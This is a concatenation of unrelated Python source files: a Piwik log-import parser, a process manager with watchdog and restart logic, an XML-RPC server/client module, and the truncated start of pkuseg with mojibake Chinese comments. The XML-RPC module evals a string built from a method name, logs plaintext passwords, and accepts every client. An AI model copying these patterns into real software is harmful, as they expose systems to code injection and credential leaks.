invalid_lines_str = ", ".join(invalid_lines)
stats.invalid_lines.extend(invalid_lines)
logging.info("The Piwik tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str))
elif 'invalid' in response and response['invalid'] > 0:
logging.info("The Piwik tracker identified %s invalid requests." % response['invalid'])
except Piwik.Error as e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno)
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError as e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be in JSON, but in case it can't be parsed just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
It's a simple container.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the white-listed downloads
# if it's a know download file, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if piwik error-ed the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
# skip auto detection for formats that can't be detected automatically
if name == 'ovh':
continue
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception as e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-milli option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def is_filtered(self, hit):
host = None
if hasattr(hit, 'host'):
host = hit.host
else:
try:
host = urlparse.urlparse(hit.path).hostname
except:
pass
if host:
if config.options.exclude_host and len(config.options.exclude_host) > 0 and host in config.options.exclude_host:
return (True, 'host matched --exclude-host')
if config.options.include_host and len(config.options.include_host) > 0 and host not in config.options.include_host:
return (True, 'host did not match --include-host')
if config.options.exclude_older_than and hit.date < config.options.exclude_older_than:
return (True, 'date is older than --exclude-older-than')
if config.options.exclude_newer_than and hit.date > config.options.exclude_newer_than:
return (True, 'date is newer than --exclude-newer-than')
return (False, None)
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
def filtered_line(line, reason):
stats.count_lines_filtered.increment()
if config.options.debug >= 2:
logging.debug('Filtered line out (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print('Parsing log %s...' % filename)
if config.format:
# The format was explicitely specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
valid_lines_count = 0
hits = []
lineno = -1
while True:
line = file.readline()
if not line: break
lineno = lineno + 1
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
valid_lines_count = valid_lines_count + 1
if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit:
if len(hits) > 0:
Recorder.add_hits(hits)
logging.info("Exceeded limit specified in --debug-request-limit, exiting.")
return
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
# Add http method page cvar
try:
httpmethod = format.get('method')
if config.options.track_http_method and httpmethod != '-':
hit.add_page_custom_var('HTTP-method', httpmethod)
except:
pass
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat detaults to - when there is no query string, but we want empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Piwik
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except (ValueError, BaseFormatException):
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
hit.date = datetime.datetime.strptime(date_string, format.date_format)
except ValueError as e:
invalid_line(line, 'invalid date or invalid format: %s' % str(e))
continue
# Parse timezone and substract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php')
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
(is_filtered, reason) = self.is_filtered(hit)
if is_filtered:
filtered_line(line, reason)
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
config = Configuration()
# The piwik object depends on the config object, so we have to create
# it after creating the configuration.
piwik = Piwik()
# The init_token_auth method may need the piwik option, so we must call
# it after creating the piwik object.
config.init_token_auth()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
process.py
|
import importlib
import os
import signal
import struct
import time
import subprocess
from typing import Optional, List, ValuesView
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc: str, name: str) -> None:
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# add daemon name to cloudlog ctx
cloudlog.bind(daemon=name)
# exec the process
getattr(mod, 'main')()
except KeyboardInterrupt:
cloudlog.warning(f"child {proc} got SIGINT")
except Exception:
# can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs: List[str], cwd: str) -> None:
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process: Process, timeout: float) -> None:
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
persistent = False
proc: Optional[Process] = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self) -> None:
pass
@abstractmethod
def start(self) -> None:
pass
def restart(self) -> None:
self.stop()
self.start()
def check_watchdog(self, started: bool) -> None:
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
# TODO: why can't pylint find struct.unpack?
self.last_watchdog_time = struct.unpack('Q', open(fn, "rb").read())[0] # pylint: disable=no-member
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
def stop(self, retry: bool=True, block: bool=True) -> Optional[int]:
if self.proc is None:
return None
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return None
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig: int) -> None:
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
# Can't signal if we don't have a pid
if self.proc.pid is None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.shouldBeRunning = self.proc is not None and not self.shutting_down
state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self) -> None:
pass
def start(self) -> None:
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info(f"starting process {self.name}")
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self) -> None:
if self.enabled:
cloudlog.info(f"preimporting {self.module}")
importlib.import_module(self.module)
def start(self) -> None:
# In case we only tried a non blocking stop we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info(f"starting python {self.module}")
self.proc = Process(name=self.name, target=launcher, args=(self.module, self.name))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running across manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self) -> None:
pass
def start(self) -> None:
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info(f"starting daemon {self.name}")
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True) -> None:
pass
def ensure_running(procs: ValuesView[ManagerProcess], started: bool, driverview: bool=False, not_run: Optional[List[str]]=None) -> None:
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif getattr(p, 'driverview', False) and driverview:
# TODO: why is driverview an argument here? can this be done with the name?
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
|
ro_XMLRPC.py
|
#
# ro_XMLRPC.py -- enhanced XML-RPC services for remoteObjects system
#
import sys
import threading
import traceback
import base64
from g2base import six
def dump_int(_, v, w):
w("<value><int>%d</int></value>" % (v))
if six.PY2:
import Queue
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler,
SimpleXMLRPCDispatcher)
from xmlrpclib import ServerProxy, Transport, Marshaller
Marshaller.dispatch[long] = dump_int
else:
import queue as Queue
from xmlrpc.server import (SimpleXMLRPCServer, SimpleXMLRPCRequestHandler,
SimpleXMLRPCDispatcher)
from xmlrpc.client import ServerProxy, Transport, Marshaller
# monkey-patch to allow python xml-rpc not to complain about large
# integers
Marshaller.dispatch[int] = dump_int
try:
import fcntl
except ImportError:
fcntl = None
from g2base import Task
version = '20160912.0'
# Timeout value for XML-RPC sockets
socket_timeout = 0.25
class Error(Exception):
"""Class of errors raised in this module."""
pass
class socketTimeout(Error):
"""Raised when a socket times out waiting for a client."""
pass
#
# ------------------ CONVENIENCE FUNCTIONS ------------------
#
class ServiceProxy(object):
def __init__(self, url):
self.url = url
# transport = MyTransport()
#self.proxy = ServerProxy(self.url, transport=transport,
# allow_none=True)
#self.proxy = ServerProxy(self.url, allow_none=True)
#self.logger = logger
def call(self, attrname, args, kwdargs):
#transport = MyTransport()
#proxy = ServerProxy(self.url, transport=transport,
# allow_none=True)
proxy = ServerProxy(self.url, allow_none=True)
method = eval('proxy.%s' % attrname)
return method(*args, **kwdargs)
def make_serviceProxy(host, port, auth=None, secure=False, timeout=None):
"""
Convenience function to make a XML-RPC service proxy.
'auth' is None for no authentication, otherwise (user, passwd)
'secure' should be True if you want to use SSL, otherwise vanilla http.
"""
if auth is not None:
user, passwd = auth
try:
if secure:
if auth is not None:
url = 'https://%s:%s@%s:%d/' % (user, passwd, host, port)
else:
url = 'https://%s:%d/' % (host, port)
else:
if auth is not None:
url = 'http://%s:%s@%s:%d/' % (user, passwd, host, port)
else:
url = 'http://%s:%d/' % (host, port)
return ServiceProxy(url)
except Exception as e:
raise Error("Can't create proxy to service found on '%s:%d': %s" % (
host, port, str(e)))
#
# ------------------ CLIENT EXTENSIONS ------------------
#
class MyTransport(Transport):
def request(self, host, handler, request_body, verbose=0):
try:
return self.single_request(host, handler, request_body, verbose)
finally:
try:
self.close()
except:
pass
#
# ------------------ THREADING EXTENSIONS ------------------
#
class ProcessingMixin(object):
"""Mix-in class to handle each request in a new thread."""
def __init__(self, daemon=False, threaded=False, threadPool=None):
self.daemon_threads = daemon
def verify_request(self, request, client_address):
#possible host-based authentication protection
ip, port = client_address
self.logger.debug("caller ip: %s:%d" % (ip, port))
#if not (ip in self.authorized_hosts):
# return False
return True
def process_request(self, request, client_address):
"""Optional multithreaded request processing."""
if self.threaded:
self.queue.put((request, client_address))
# Default behavior is single-threaded sequential execution
else:
self.do_process_request(request, client_address)
def do_process_request(self, request, client_address):
self.finish_request(request, client_address)
self.shutdown_request(request)
request.close()
#
# ------------------ XML-RPC SERVERS ------------------
#
class XMLRPCRequestHandler(SimpleXMLRPCRequestHandler):
"""Subclass SimpleXMLRPCRequestHandler to add basic HTTP authentication
check.
"""
# def __init__(self, *args, **kwdargs):
# SimpleXMLRPCRequestHandler.__init__(*args, **kwdargs)
def setup(self):
SimpleXMLRPCRequestHandler.setup(self)
# *** NOTE: NO KEEP-ALIVE!!! ***
# Keep-alive does not play well with multithreaded xml-rpc
self.server.close_connection = True
self.protocol_version = "HTTP/1.0"
def get_authorization_creds(self):
auth = self.headers.get("authorization", None)
logger = self.server.logger
#logger.debug("Auth is %s" % (str(auth)))
if auth is not None:
try:
method, auth = auth.split()
if method.lower() == 'basic':
#logger.debug("decoding base64...")
auth = base64.b64decode(auth.encode()).decode()
#logger.debug("splitting...")
username, password = auth.split(':')
logger.debug("username: '%s', password: '%s'" % (
username, password))
auth = { 'method': 'basic',
'username': username,
'password': password,
}
else:
logger.error("unsupported auth method: '%s'" % method)
auth = None
except Exception as e:
logger.error("unrecognized auth cred: '%s'" % auth,
exc_info=True)
auth = None
return auth
def _dispatch(self, method, params):
"""
Called to dispatch an XML-RPC request.
"""
auth = self.get_authorization_creds()
# Refer back to server to do the dispatch
return self.server.do_dispatch(method, params, auth,
self.client_address)
# Using the ProcessingMixin allows the XML-RPC server to handle more than
# one request at a time.
#
class XMLRPCServer(ProcessingMixin, SimpleXMLRPCServer):
"""
Basic XML-RPC server.
"""
# Note: cert_file param is just for constructor compatibility with
# SecureXMLRPCServer--it is ignored
def __init__(self, host, port, ev_quit=None, timeout=socket_timeout,
logger=None,
requestHandler=XMLRPCRequestHandler,
logRequests=False, allow_none=True, encoding=None,
threaded=False, threadPool=None, numthreads=5,
authDict=None, cert_file=None):
SimpleXMLRPCServer.__init__(self, (host, port),
requestHandler=requestHandler,
logRequests=logRequests,
allow_none=allow_none, encoding=encoding)
ProcessingMixin.__init__(self, threaded=threaded, threadPool=threadPool)
if logger:
self.logger = logger
else:
self.logger = logging.Logger('null')
# Our termination flag
if not ev_quit:
self.ev_quit = threading.Event()
else:
self.ev_quit = ev_quit
# Defines how responsive to termination we are
self.timeout = timeout
self.authDict = authDict
self.threaded = threaded
self.threadPool = threadPool
self._num_threads = numthreads
# Create an attribute to hold the Queue object. The actual
# Queue object will be created in the start method if this
# server is to be run in threaded mode.
self.queue = None
# Make XML-RPC sockets not block indefinitely
#self.socket.settimeout(timeout)
# Override anemic limit of python's default SocketServer
self.socket.listen(64)
# [Bug #1222790] If possible, set close-on-exec flag; if a
# method spawns a subprocess, the subprocess shouldn't have
# the listening socket open.
if fcntl is not None and hasattr(fcntl, 'FD_CLOEXEC'):
flags = fcntl.fcntl(self.fileno(), fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(self.fileno(), fcntl.F_SETFD, flags)
def start(self, use_thread=True):
# Threaded server. Start N workers either as new threads or using
# the thread pool, if we have one.
if self.threaded:
# queue for communicating with workers
self.queue = Queue.Queue()
for i in range(self._num_threads):
if self.threadPool == None:
thread = threading.Thread(target=self.worker,
name="RPC-Worker-%d" % (i+1),
args=[i, self.queue])
thread.daemon = False
thread.start()
else:
task = Task.FuncTask2(self.worker, i, self.queue)
self.threadPool.addTask(task)
if not use_thread:
self.serve_forever()
else:
if self.threadPool == None:
thread = threading.Thread(target=self.serve_forever)
thread.daemon=True
thread.start()
else:
task = Task.FuncTask2(self.serve_forever)
self.threadPool.addTask(task)
def stop(self):
# If this server has a Queue, put a message on the queue to
# tell the threads to shutdown.
if self.queue is not None:
self.queue.put((None, None))
# use another thread to call shutdown because if we happen to
# be in the same thread as server_forever() it will deadlock
thread = threading.Thread(target=self.shutdown)
thread.start()
self.ev_quit.set()
#self.server_close()
def worker(self, i, queue):
self.logger.info("worker %d spinning up..." % (i))
while not self.ev_quit.isSet():
try:
# NOTE: if timeout is specified, then performance
# drops *substantially*.
tup = queue.get(block=True, timeout=None)
assert len(tup) == 2, \
Error("Invalid queue contents: len(tup) != 2 (%d)" % (
len(tup)))
request, client_address = tup
if request == None:
# Put termination sentinal back on the queue for other
# workers to discover and terminate
queue.put(tup)
break
except Queue.Empty:
continue
try:
self.do_process_request(request, client_address)
except Exception as e:
self.logger.error("Error processing request: %s" % (str(e)))
self.logger.info("worker %d shutting down..." % (i))
def authenticate_client(self, methodName, params, auth, client_address):
# this is the caller's ip address and port
ip, port = client_address
if not auth:
self.logger.error("No authentication credentials passed")
raise Error("Service requires authentication and no credentials passed")
# this is the client authentication, pulled from the HTTP header
try:
username = auth['username']
password = auth['password']
except KeyError:
self.logger.error("Bad authentication credentials passed")
raise Error("Service only handles 'basic' authentication type")
if not username in self.authDict:
self.logger.error("No user matching '%s'" % username)
self.logger.info("authdict is '%s'" % str(self.authDict))
# sleep thwarts brute force attacks
# but also delays applications when there is a legitimate
# authentication mismatch
#time.sleep(1.0)
raise Error("Service requires authentication; username or password mismatch")
if self.authDict[username] != password:
self.logger.error("Password incorrect '%s'" % password)
# sleep thwarts brute force attacks
time.sleep(1.0)
raise Error("Service requires authentication; username or password mismatch")
self.logger.debug("Authorized client '%s'" % (username))
def do_dispatch(self, methodName, params, auth, client_addr):
try:
if self.authDict:
self.authenticate_client(methodName, params, auth, client_addr)
# log all method calls, but truncate params to a reasonable size
# in case a huge parameter(s) was sent
self.logger.debug("calling method %s(%s)" % (str(methodName),
str(params)[:500]))
response = SimpleXMLRPCDispatcher._dispatch(self, methodName,
params)
#response = self.my_dispatch(methodName, params, auth, client_addr)
self.logger.debug("response is: %s" % str(response))
return response
except Exception as e:
self.logger.error("Method %s raised exception: %s" % (str(methodName),
str(e)))
try:
(type, value, tb) = sys.exc_info()
tb_str = ("Traceback:\n%s" % '\n'.join(traceback.format_tb(tb)))
self.logger.error(tb_str)
except:
self.logger.error("Traceback information unavailable")
raise e
def get_serverClass(secure=False):
return XMLRPCServer
#END
|
__init__.py
|
from __future__ import print_function
import sys
if sys.version_info[0] < 3:
print("pkuseg does not support python2", file=sys.stderr)
sys.exit(1)
import os
import time
import multiprocessing
from multiprocessing import Process, Queue
import pkuseg.trainer as trainer
import pkuseg.inference as _inf
from pkuseg.config import config
from pkuseg.feature_extractor import FeatureExtractor
from pkuseg.model import Model
class TrieNode:
"""ๅปบ็ซ่ฏๅ
ธ็Trieๆ ่็น"""
def __init__(self, isword):
self.isword = isword
self.children = {}
class Preprocesser:
"""้ขๅค็ๅจ๏ผๅจ็จๆท่ฏๅ
ธไธญ็่ฏๅผบๅถๅๅฒ"""
def __init__(self, dict_file):
"""ๅๅงๅๅปบ็ซTrieๆ """
self.dict_data = dict_file
if isinstance(dict_file, str):
with open(dict_file, encoding="utf-8") as f:
lines = f.readlines()
self.trie = TrieNode(False)
for line in lines:
self.insert(line.strip())
else:
self.trie = TrieNode(False)
for w in dict_file:
assert isinstance(w, str)
self.insert(w.strip())
def insert(self, word):
"""Trieๆ ไธญๆๅ
